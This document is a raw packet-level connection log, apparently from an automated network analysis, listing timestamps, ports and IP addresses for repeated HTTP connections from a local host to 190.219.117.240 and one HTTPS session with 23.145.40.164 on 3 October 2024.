Oct 3, 2024 02:52:33.475996971 CEST	49745	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:33.481132030 CEST	80	49745	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:33.481159925 CEST	80	49745	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:34.564838886 CEST	80	49745	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:34.595237017 CEST	80	49745	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:34.595323086 CEST	49745	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:34.595362902 CEST	49745	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:34.598066092 CEST	49746	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:34.600431919 CEST	80	49745	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:34.602941036 CEST	80	49746	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:34.603028059 CEST	49746	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:34.603136063 CEST	49746	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:34.603157997 CEST	49746	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:34.607953072 CEST	80	49746	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:34.608083010 CEST	80	49746	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:35.755268097 CEST	80	49746	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:35.763641119 CEST	80	49746	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:35.763792038 CEST	49746	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:35.770946026 CEST	49746	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:35.776109934 CEST	80	49746	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:35.800379992 CEST	49747	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:35.805594921 CEST	80	49747	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:35.805670977 CEST	49747	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:35.808037996 CEST	49747	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:35.808073997 CEST	49747	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:35.812897921 CEST	80	49747	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:35.813091040 CEST	80	49747	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:36.896193981 CEST	80	49747	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:36.902345896 CEST	80	49747	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:36.903394938 CEST	49747	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:36.904025078 CEST	49747	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:36.906241894 CEST	49748	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:36.909437895 CEST	80	49747	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:36.911885023 CEST	80	49748	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:36.914499044 CEST	49748	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:36.914623976 CEST	49748	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:36.914649010 CEST	49748	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:36.919718027 CEST	80	49748	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:36.919856071 CEST	80	49748	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:38.024081945 CEST	80	49748	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:38.029937029 CEST	80	49748	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:38.030098915 CEST	49748	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:38.030100107 CEST	49748	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:38.032227039 CEST	49749	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:38.035017014 CEST	80	49748	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:38.037163973 CEST	80	49749	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:38.037246943 CEST	49749	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:38.037350893 CEST	49749	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:38.037350893 CEST	49749	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:38.042182922 CEST	80	49749	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:38.042212963 CEST	80	49749	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:39.123039961 CEST	80	49749	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:39.129101992 CEST	80	49749	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:39.129457951 CEST	49749	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:39.129457951 CEST	49749	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:39.131480932 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:39.134937048 CEST	80	49749	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:39.136729956 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:39.136965990 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:39.136965990 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:39.136965990 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:39.142421961 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:39.142455101 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.272486925 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.272533894 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.272562027 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.272613049 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.272613049 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.272697926 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.272905111 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.272959948 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.273628950 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.273690939 CEST	49750	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.274733067 CEST	49751	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.278161049 CEST	80	49750	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.280390024 CEST	80	49751	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.280535936 CEST	49751	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.280611038 CEST	49751	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.280636072 CEST	49751	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:41.285713911 CEST	80	49751	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:41.285798073 CEST	80	49751	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:42.376409054 CEST	80	49751	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:42.384263039 CEST	80	49751	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:42.384475946 CEST	49751	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:42.384475946 CEST	49751	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:42.386678934 CEST	49752	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:42.389924049 CEST	80	49751	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:42.392152071 CEST	80	49752	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:42.392312050 CEST	49752	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:42.392420053 CEST	49752	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:42.392446995 CEST	49752	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:42.397783041 CEST	80	49752	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:42.397902012 CEST	80	49752	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:43.552974939 CEST	80	49752	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:43.560564995 CEST	80	49752	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:43.560652018 CEST	49752	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:43.560733080 CEST	49752	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:43.562674046 CEST	49753	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:43.566322088 CEST	80	49752	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:43.567693949 CEST	80	49753	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:43.567790985 CEST	49753	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:43.567970991 CEST	49753	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:43.568006992 CEST	49753	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:43.572853088 CEST	80	49753	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:43.572884083 CEST	80	49753	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:44.660093069 CEST	80	49753	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:44.667707920 CEST	80	49753	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:44.667910099 CEST	49753	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:44.667910099 CEST	49753	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:44.670255899 CEST	49754	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:44.673695087 CEST	80	49753	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:44.675863028 CEST	80	49754	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:44.675935984 CEST	49754	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:44.676074028 CEST	49754	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:44.676100016 CEST	49754	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:44.680934906 CEST	80	49754	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:44.681122065 CEST	80	49754	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:45.770915985 CEST	80	49754	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:45.777308941 CEST	80	49754	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:45.777403116 CEST	49754	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:45.777493000 CEST	49754	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:45.780369043 CEST	49755	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:45.782783031 CEST	80	49754	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:45.785845041 CEST	80	49755	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:45.785947084 CEST	49755	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:45.786030054 CEST	49755	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:45.786030054 CEST	49755	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:45.791496038 CEST	80	49755	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:45.791507959 CEST	80	49755	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:46.899544954 CEST	80	49755	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:46.913916111 CEST	80	49755	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:46.914016962 CEST	49755	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:46.914099932 CEST	49755	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:46.916726112 CEST	49756	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:46.919171095 CEST	80	49755	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:46.921845913 CEST	80	49756	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:46.921921015 CEST	49756	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:46.922025919 CEST	49756	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:46.922041893 CEST	49756	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:46.926745892 CEST	80	49756	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:46.926892042 CEST	80	49756	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:48.006617069 CEST	80	49756	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:48.014060020 CEST	80	49756	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:48.014247894 CEST	49756	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:48.014343977 CEST	49756	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:48.016635895 CEST	49757	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:48.019290924 CEST	80	49756	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:48.021481037 CEST	80	49757	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:48.021553040 CEST	49757	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:48.021768093 CEST	49757	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:48.021769047 CEST	49757	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:48.026561975 CEST	80	49757	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:48.026571035 CEST	80	49757	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:49.125507116 CEST	80	49757	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:49.132107973 CEST	80	49757	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:49.132178068 CEST	49757	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:49.132268906 CEST	49757	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:49.134552956 CEST	49758	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:49.137178898 CEST	80	49757	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:49.139319897 CEST	80	49758	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:49.139408112 CEST	49758	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:49.139525890 CEST	49758	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:49.139568090 CEST	49758	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:49.144273996 CEST	80	49758	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:49.144408941 CEST	80	49758	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:50.225066900 CEST	80	49758	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:50.225085974 CEST	80	49758	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:50.225514889 CEST	49758	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:50.225599051 CEST	49758	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:50.227684975 CEST	49759	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:50.230906963 CEST	80	49758	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:50.232549906 CEST	80	49759	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:50.232903957 CEST	49759	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:50.232947111 CEST	49759	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:50.232956886 CEST	49759	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:50.237750053 CEST	80	49759	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:50.238053083 CEST	80	49759	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:51.414446115 CEST	80	49759	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:51.419142008 CEST	80	49759	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:51.419382095 CEST	49759	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:51.419382095 CEST	49759	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:51.421859026 CEST	49760	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:51.425314903 CEST	80	49759	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:51.426604986 CEST	80	49760	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:51.426676035 CEST	49760	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:51.427004099 CEST	49760	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:51.427081108 CEST	49760	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:51.432780027 CEST	80	49760	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:51.433018923 CEST	80	49760	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:52.738327026 CEST	80	49760	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:52.746747971 CEST	80	49760	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:52.746812105 CEST	49760	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:52.746862888 CEST	49760	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:52.748821974 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:52.748941898 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:52.749079943 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:52.749376059 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:52.749401093 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:52.751602888 CEST	80	49760	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:53.356667042 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.356861115 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.360599995 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.360630035 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.361040115 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.368499041 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.411428928 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.566905975 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.566926003 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.567003012 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.567037106 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.612270117 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.652934074 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.652956963 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.653024912 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.653187037 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.653192997 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.653247118 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.654259920 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.654324055 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.655133963 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.655196905 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.739536047 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.739631891 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.739654064 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.739725113 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.740721941 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.740782022 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.740793943 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.740859985 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.741569042 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.741628885 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.742485046 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.742547035 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.743273973 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.743335009 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.809613943 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.809809923 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.826592922 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.826837063 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.826865911 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.826883078 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.826919079 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.826919079 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.827048063 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.827112913 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.827409983 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.827475071 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.827996016 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.828052998 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.828622103 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.828682899 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.828685045 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.828706980 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.828756094 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.828757048 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.829807997 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.829844952 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.829868078 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.829884052 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.829906940 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.829926968 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.830884933 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.830919027 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.830946922 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.830959082 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.830981970 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.831027031 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.855910063 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.855993986 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.896121979 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.896198988 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913045883 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.913085938 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.913125038 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913139105 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.913165092 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913189888 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913264990 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.913322926 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913530111 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.913590908 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913754940 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.913806915 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.913808107 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913857937 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913918972 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.913952112 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.913996935 CEST	49761	443	192.168.2.4	23.145.40.164
Oct 3, 2024 02:52:53.914014101 CEST	443	49761	23.145.40.164	192.168.2.4
Oct 3, 2024 02:52:53.964123964 CEST	49763	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:53.970220089 CEST	80	49763	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:53.970432997 CEST	49763	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:53.970432997 CEST	49763	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:53.970432997 CEST	49763	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:53.975339890 CEST	80	49763	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:53.975439072 CEST	80	49763	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:55.080913067 CEST	80	49763	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:55.088754892 CEST	80	49763	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:55.089068890 CEST	49763	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:55.089121103 CEST	49763	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:55.093158960 CEST	49764	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:55.096780062 CEST	80	49763	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:55.098115921 CEST	80	49764	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:55.098181963 CEST	49764	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:55.103493929 CEST	49764	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:55.103493929 CEST	49764	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:55.108561039 CEST	80	49764	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:55.109512091 CEST	80	49764	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:56.192848921 CEST	80	49764	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:56.197271109 CEST	80	49764	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:56.197434902 CEST	49764	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:56.197436094 CEST	49764	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:56.201538086 CEST	49765	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:56.203900099 CEST	80	49764	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:56.206531048 CEST	80	49765	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:56.206604958 CEST	49765	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:56.206717014 CEST	49765	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:56.206743002 CEST	49765	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:56.211661100 CEST	80	49765	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:56.211678028 CEST	80	49765	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:57.296926975 CEST	80	49765	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:57.296948910 CEST	80	49765	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:57.297018051 CEST	49765	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:57.297147036 CEST	49765	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:57.299400091 CEST	49766	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:57.302508116 CEST	80	49765	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:57.304238081 CEST	80	49766	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:57.304306030 CEST	49766	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:57.304415941 CEST	49766	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:57.304440975 CEST	49766	80	192.168.2.4	190.219.117.240
Oct 3, 2024 02:52:57.309192896 CEST	80	49766	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:57.309333086 CEST	80	49766	190.219.117.240	192.168.2.4
Oct 3, 2024 02:52:58.422266006 CEST	80	49766	190.219.117.240	192.168.2.4
